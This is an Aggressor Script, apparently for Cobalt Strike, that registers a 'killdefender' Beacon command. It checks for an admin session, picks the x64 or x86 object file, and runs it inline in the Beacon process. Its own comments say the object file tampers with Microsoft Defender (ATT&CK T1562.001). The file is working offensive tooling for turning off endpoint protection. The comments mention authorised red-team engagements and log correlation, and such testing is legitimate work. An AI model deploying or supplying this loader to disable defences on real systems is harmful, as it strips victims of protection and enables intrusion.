killdefender.cna
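# Aggressor Script front end for the "killdefender" Beacon Object File (BOF).
#
# Registers a Beacon console command that loads the architecture-matching
# object file shipped next to this script and runs its "go" entry point inside
# the Beacon process. What the object file does is not visible from this
# script; going by the command text it tampers with Microsoft Defender, which
# corresponds to MITRE ATT&CK T1562.001 (Impair Defenses: Disable or Modify
# Tools).
#
# NOTE(review): for authorised engagements, the task line below is the record
# that ties this action to a time and session in the Beacon log and reports.
# Keep it so defenders can correlate it with endpoint telemetry afterwards.
beacon_command_register("killdefender", "kill defender", "Example: killdefender");

# killdefender - run the BOF in the current Beacon session.
#   $1 - Beacon ID of the session the command was typed in.
# Takes no further arguments and passes none to the BOF.
alias killdefender {
    # Scope the working variables to this alias; without this they are
    # script-wide globals and leak between invocations and other aliases.
    local('$barch $handle $data');

    # Refuse before touching the disk: the BOF is only run from an elevated
    # session, so there is no reason to load it otherwise.
    if (!-isadmin $1)
    {
        berror($1, "We require an elevated session (admin)");
        return;
    }

    # Choose the object file built for the Beacon's architecture.
    if (-is64 $1)
    {
        $barch = "x64";
    }
    else
    {
        $barch = "x86";
    }

    # Read the compiled BOF from the script's own directory.
    $handle = openf(script_resource("killdefender." . $barch . ".o"));
    $data   = readb($handle, -1);
    closef($handle);

    # Empty data means the object file is missing or was never compiled.
    if (strlen($data) == 0)
    {
        berror($1, "could not read bof file");
        return;
    }

    # Log the task with its ATT&CK technique so the activity report maps this
    # action to T1562.001 (inferred from the command text, see header).
    btask($1, "Hold on to your butts! Killing Defender!", "T1562.001");

    # Run the BOF inline in the Beacon process. This is not a spawned post-ex
    # job and no DLL is involved. $barch already selected the right build, so
    # a single call serves both architectures.
    beacon_inline_execute($1, $data, "go", $null);
}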